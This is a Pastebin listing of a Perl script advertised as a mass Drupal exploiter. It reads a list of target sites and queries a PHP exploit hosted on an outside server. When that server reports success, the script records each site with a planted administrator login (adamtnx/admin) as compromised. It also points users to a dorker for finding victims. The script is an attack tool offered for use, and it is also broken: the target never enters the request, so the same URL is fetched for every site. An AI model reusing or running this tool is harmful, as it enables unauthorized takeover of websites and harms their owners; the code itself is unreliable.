Advertisement
AdamTnx

Mass Drupal Exploiter by Adam tnx

Dec 17th, 2017
468
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.76 KB | None | 0 0
  1. #!/usr/bin/perl -U
  2. # drupal exploiter by adam tnx
  3. # don't change my copyright madafakaa -_-
  4. # admtnx©2017
  5. #salam for all
  6.  
  7. use HTTP::Request;
  8. use LWP::UserAgent;
  9. use IO::Select;
  10. use HTTP::Response;
  11. use Term::ANSIColor;
  12. print color('reset');
  13. if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
  14. my $tnx ="
  15.            .                                    .              
  16.         `  y`                                  /: ``            
  17.         `` /d:                     --        `sd` .            
  18.          ```:sd+.              -oooy:      /yd+.``              
  19.         `` `` .ymh-           /syyydo   `ommo`````.            
  20.         `-:``  `oym/         `yyyyNm   `ddy/   `.:`            
  21.         ./:-.`` `.+-         +ys+hMm    y/`  ``.-::            
  22.          .ss+-``` `         . -smdMs    -` .`./oy/              
  23.           :+oo/:. ``       /- `o/yMo    ```.:/oo/.              
  24.            -+os+:..-    `/hs: -/ydM:   .-`-/ooo/`              
  25.               -:-.`-.`  ohh-y +- +M`  --.`---`                  
  26.               :/o+:-.+/ `yd:/`/.-so :s/.-/o+/.                  
  27.                 -.o`  -+:-h/hsd/--:+/`  //..                    
  28.                         ./yo+-/+yo-                            
  29.                            .`y- `                              
  30.  Coded by Adam Tnx          `N:`                                
  31.      fb/adam.ag.750          s.`                                
  32.                               `                                
  33.    
  34. \n\n
  35. ";
  36.  
  37.     print color('bold blue');
  38.  
  39. print $tnx;
  40. print color("red"), "W3lcome..New Mass Drupal exploiter  \n";
  41. print color("green"), "If you need some website use the dorker \n";
  42. print color("green"), " you will find it with this bot  \n";
  43. print "List : \n";
  44. $list=<STDIN>;
  45. open(tarrget,"<$list") or die "add list \n";
  46. while(<tarrget>){
  47. chomp($_);
  48. $target = $_;
  49. if($target !~ /www./) { $target = "www.$target"; };
  50. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  51.  
  52. my $exploit = "http://www.xgames.co.il/drupal_mass_exploiter.php";
  53. my $checkk = $ua->get("$exploit")->content;
  54. if($checkk =~/Success! Log in with username \"adamtnx\" and password \"admin\" at/) {
  55. print color('bold white');
  56. print "[";
  57. print color('reset');
  58. print color('bold green');
  59. print "OK";
  60. print color('reset');
  61. print color('bold white');
  62. print "] ";
  63. print color ('green');
  64. print "$target";
  65. print color ('reset');
  66. print " tneek :)  !! \n";
  67.  
  68.  
  69.    open(save, '>>tnxVuln.txt');
  70.  
  71.    print save " Don3 ! $target | username : adamtnx | pass: admin\n";
  72.  
  73.    close(save);
  74. }
  75. else {
  76.  
  77. #####################
  78. ###error madafak#####
  79. #####################
  80. print color ('blue');
  81. print "$target";
  82. print color ('reset');
  83. print " OOPS !! not vuln! \n";
  84. }
  85.  
  86. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement